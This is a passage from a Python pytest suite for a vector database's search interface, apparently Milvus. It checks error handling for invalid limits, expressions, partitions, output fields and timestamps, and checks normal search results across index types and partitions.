"invalid limit (topK) = %s" % limit)
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
"""
target: test search with invalid parameter type
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_type
log.info("test_search_param_invalid_expr_type: searching with "
"invalid expr: {}".format(invalid_search_expr))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The type of expr must be string ,"
"but {} is given".format(type(invalid_search_expr))})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_value
log.info("test_search_param_invalid_expr_value: searching with "
"invalid expr: %s" % invalid_search_expr)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
"""
target: test search invalid partition
method: search with invalid partition type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search the invalid partition
partition_name = get_invalid_partition
err_msg = "`partition_name_array` value {} is illegal".format(partition_name)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, partition_name,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
"""
target: test search with output fields
method: search with invalid output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search
log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % collection_w.name)
output_fields = get_invalid_output_fields
err_msg = "`output_fields` value {} is illegal".format(output_fields)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release partition
3. search the released partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
target: test search with empty connection
method: 1. search the empty collection before load
2. search the empty collection after load
3. search collection with data inserted but not load again
expected: 1. raise exception if not loaded
2. return topk=0 if loaded
3. return topk successfully
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
# 4. search with data inserted but not load again
data = cf.gen_default_dataframe_data(nb=2000)
insert_res, _ = collection_w.insert(data)
# TODO: remove sleep with search grantee_timestamp when issue #10101 fixed
sleep(1)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_res.primary_keys,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. create a collection with partitions
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, index, params):
"""
target: test search with different index
method: test search with different index
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
is_index=True)[0:4]
# 2. create different index
if params.get("m"):
if (default_dim % params["m"]) != 0:
params["m"] = default_dim // 4
log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_different_index_invalid_params: Created index-%s" % index)
collection_w.load()
# 3. search
log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search not existed partition
method: search with not existed partition
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non_exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
target: test search within binary data (invalid parameter)
method: search with wrong metric type
expected: raise exception and report the error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
"""
target: search binary collection using FlAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: raise exception
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)[0:4]
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "Field int63 not exist"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_invalid_wildcard: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_param_invalid_travel_timestamp(self, get_invalid_travel_timestamp):
"""
target: test search with invalid travel timestamp
method: search with invalid travel timestamp
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid travel timestamp
log.info("test_search_param_invalid_travel_timestamp: searching with invalid travel timestamp")
invalid_travel_time = get_invalid_travel_timestamp
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
travel_timestamp=invalid_travel_time,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`travel_timestamp` value %s is illegal" % invalid_travel_time})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="issue 11985")
def test_search_param_invalid_guarantee_timestamp(self, get_invalid_guarantee_timestamp):
"""
target: test search with invalid guarantee timestamp
method: search with invalid guarantee timestamp
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid travel timestamp
log.info("test_search_param_invalid_guarantee_timestamp: searching with invalid guarantee timestamp")
invalid_guarantee_time = get_invalid_guarantee_timestamp
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
guarantee_timestamp=invalid_guarantee_time,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`guarantee_timestamp` value %s is illegal"
% invalid_guarantee_time})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("round_decimal", [7, -2, 999, 1.0, None, [1], "string", {}])
def test_search_invalid_round_decimal(self, round_decimal):
"""
target: test search with invalid round decimal
method: search with invalid round decimal
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, nb=10)[0]
# 2. search
log.info("test_search_invalid_round_decimal: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, round_decimal=round_decimal,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"`round_decimal` value {round_decimal} is illegal"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function",
params=[default_nb, default_nb_medium])
def nb(self, request):
yield request.param
@pytest.fixture(scope="function", params=[2, 500])
def nq(self, request):
yield request.param
@pytest.fixture(scope="function", params=[8, 128])
def dim(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def auto_id(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: 1. search returned with 0 before travel timestamp
2. search successfully with limit(topK) after travel timestamp
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:5]
# 2. search before insert time_stamp
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp - 1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0})
# 3. search after insert time_stamp
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp,
guarantee_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tag(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
method: create connections,collection insert and search vectors in collections
expected: search successfully with limit(topK) and can be hit at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
vectors = [vectors[i][-1] for i in range(nq)]
log.info("test_search_with_hit_vectors: searching collection %s" % collection_w.name)
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
log.info("test_search_with_hit_vectors: checking the distance of top 1")
for hits in search_res:
# verify that top 1 hit is itself,so min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dup_times", [1,2,3])
def test_search_with_dup_primary_key(self, dim, auto_id, _async, dup_times):
"""
target: test search with duplicate primary key
method: 1.insert same data twice
2.search
expected: search results are de-duplicated
"""
# initialize with data
nb = ct.default_nb
nq = ct.default_nq
collection_w, insert_data, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# insert dup data multi times
for i in range(dup_times):
insert_res, _ = collection_w.insert(insert_data[0])
insert_ids.extend(insert_res.primary_keys)
# search
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
# assert that search results are de-duplicated
for hits in search_res:
ids = hits.ids
assert sorted(list(set(ids))) == sorted(ids)
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_ndarray(self, dim, auto_id, _async):
"""
target: test search with ndarray
method: search using ndarray data
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search collection without data
log.info("test_search_with_ndarray: Searching collection %s "
"using ndarray" % collection_w.name)
vectors = np.random.randn(default_nq, dim)
collection_w.search(vectors, default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# 2. search
log.info("test_search_normal_default_params: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self, nq, dim, auto_id, _async):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release all partitions
3. search the collection
expected: 0 entity should be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_collection_after_release_load: releasing collection %s" % collection_w.name)
collection_w.release()
log.info("test_search_collection_after_release_load: released collection %s" % collection_w.name)
# 3. Search the pre-released collection after load
log.info("test_search_collection_after_release_load: loading collection %s" % collection_w.name)
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6997")
def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release a partition
3. load partition
4. search the pre-released partition
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 4. Search the pre-released partition after load
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
"""
target: test search when load before flush
method: 1. insert data and load
2. flush, and load
3. search the collection
expected: search success with limit(topK)
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
# 3. load data
collection_w.load()
# 4. flush and load
collection_w.num_entities
collection_w.load()
# 5. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_new_data(self, nq, dim, auto_id, _async):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
4. Use guarantee_timestamp to guarantee data consistency
expected: new data should be searched
"""
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb_old,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search for original data after load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp + 1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old,
"_async": _async})
# 3. insert new data
nb_new = 300
_, _, _, insert_ids_new, time_stamp = cf.insert_data(collection_w, nb_new,
auto_id=auto_id, dim=dim,
insert_offset=nb_old)
insert_ids.extend(insert_ids_new)
# 4. search for new data without load
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
guarantee_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old + nb_new,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="debug")
def test_search_max_dim(self, auto_id, _async):
"""
target: test search with max configuration
method: create connection, collection, insert and search with max dim
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 100,
auto_id=auto_id,
dim=max_dim)[0:4]
# 2. search
nq = 2
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, nq,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nq,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search after different index
method: test search after different index and corresponding search params
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create index and load
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
